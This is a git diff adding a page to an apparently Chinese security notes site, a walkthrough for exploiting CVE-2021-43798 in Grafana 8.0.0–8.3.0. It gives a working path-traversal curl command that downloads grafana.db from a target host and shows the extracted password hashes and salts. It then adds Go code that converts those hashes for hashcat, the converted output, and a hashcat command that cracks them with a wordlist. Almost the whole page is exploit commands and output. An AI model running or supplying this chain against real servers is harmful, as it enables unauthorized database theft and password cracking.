diff --git a/content/Vulnerabilities/CVE-2021-43798.md b/content/Vulnerabilities/CVE-2021-43798.md new file mode 100644 index 0000000..7b68f18 --- /dev/null +++ b/content/Vulnerabilities/CVE-2021-43798.md @@ -0,0 +1,120 @@ +--- +title: "CVE-2021-43798" +draft: false +tag: hashcat +weight: 4 +--- + +Grafana 8.0.0 - 8.3.0 + + + +```bash +$ curl -o grafana.db --path-as-is http://10.9.49.22:3000/public/plugins/welcome/../../../../../../../../var/lib/grafana/grafana.db +$ sqlite3 grafana.db +SQLite version 3.31.1 2020-01-27 19:55:54 +Enter ".help" for usage hints. +sqlite> .tables +alert login_attempt +alert_configuration migration_log +alert_instance ngalert_configuration +alert_notification org +alert_notification_state org_user +alert_rule playlist +alert_rule_tag playlist_item +alert_rule_version plugin_setting +annotation preferences +annotation_tag quota +api_key server_lock +cache_data session +dashboard short_url +dashboard_acl star +dashboard_provisioning tag +dashboard_snapshot team +dashboard_tag team_member +dashboard_version temp_user +data_source test_data +kv_store user +library_element user_auth +library_element_connection user_auth_token +``` + + + +create file `passwordsalt.txt` + +```txt +e21680070fb3a72d8cac29819eb74ddbee669a9d362dea5c4674d8287e4a1df22424fcdd00ab0cc8230d4249296adc2adca8|NcgfTdzwPc +18e6160a5e7e03a7dea259195b27543c2d1b515e4490867c73ffb6214d08f77163ecc0f58321a40deb300ec563c15a327733|13CdHYK4Xl +20ae2e2828c004ef4638f6d490a23aa9956cc4bfeb1db60abd18930f97099782037c6861518b466e20addc36dfda5f564d78|bhhVgTns9o +``` + +### grafana-hashcat.go + +create file `grafana-hashcat.go` + +```go +package main + +import ( + "bufio" + "encoding/base64" + "encoding/hex" + "fmt" + "os" + "strings" +) + +func tohashes(password, salt string) string { + passwordBytes, err := hex.DecodeString(password) + if err != nil { + return fmt.Sprintf("Error decoding hex: %v", err) + } + passwordBase64 := base64.StdEncoding.EncodeToString(passwordBytes) + saltBase64 := base64.StdEncoding.EncodeToString([]byte(salt)) + return fmt.Sprintf("sha256:10000:%s:%s", saltBase64, passwordBase64) +} + +func main() { + file, err := os.Open("passwordsalt.txt") + if err != nil { + fmt.Println("Error opening file:", err) + return + } + defer file.Close() + + scanner := bufio.NewScanner(file) + for scanner.Scan() { + line := scanner.Text() + parts := strings.Split(line, "|") + if len(parts) != 2 { + fmt.Println("Invalid line:", line) + continue + } + fmt.Println(tohashes(parts[0], parts[1])) + } + + if err := scanner.Err(); err != nil { + fmt.Println("Error reading file:", err) + } +} + +``` + +**RUN** + +```cmd +> go run .\grafana-hashcat.go +sha256:10000:TmNnZlRkendQYw==:4haABw+zpy2MrCmBnrdN2+5mmp02LepcRnTYKH5KHfIkJPzdAKsMyCMNQkkpatwq3Kg= +sha256:10000:MTNDZEhZSzRYbA==:GOYWCl5+A6feolkZWydUPC0bUV5EkIZ8c/+2IU0I93Fj7MD1gyGkDeswDsVjwVoydzM= +sha256:10000:YmhoVmdUbnM5bw==:IK4uKCjABO9GOPbUkKI6qZVsxL/rHbYKvRiTD5cJl4IDfGhhUYtGbiCt3Dbf2l9WTXg= +``` + +### hashcat + +```cmd +> hashcat.exe -m 10900 hashes.txt rockyou.txt -o o.txt +``` + + +参考: \ No newline at end of file diff --git a/content/Vulnerabilities/_index.md b/content/Vulnerabilities/_index.md index 1cb4c28..9c33c8d 100644 --- a/content/Vulnerabilities/_index.md +++ b/content/Vulnerabilities/_index.md @@ -4,8 +4,4 @@ draft: false weight: 4 --- -## 什么是渗透测试 - -## 从了解到发现不安全 - -## 学习好理论 \ No newline at end of file +漏洞利用 \ No newline at end of file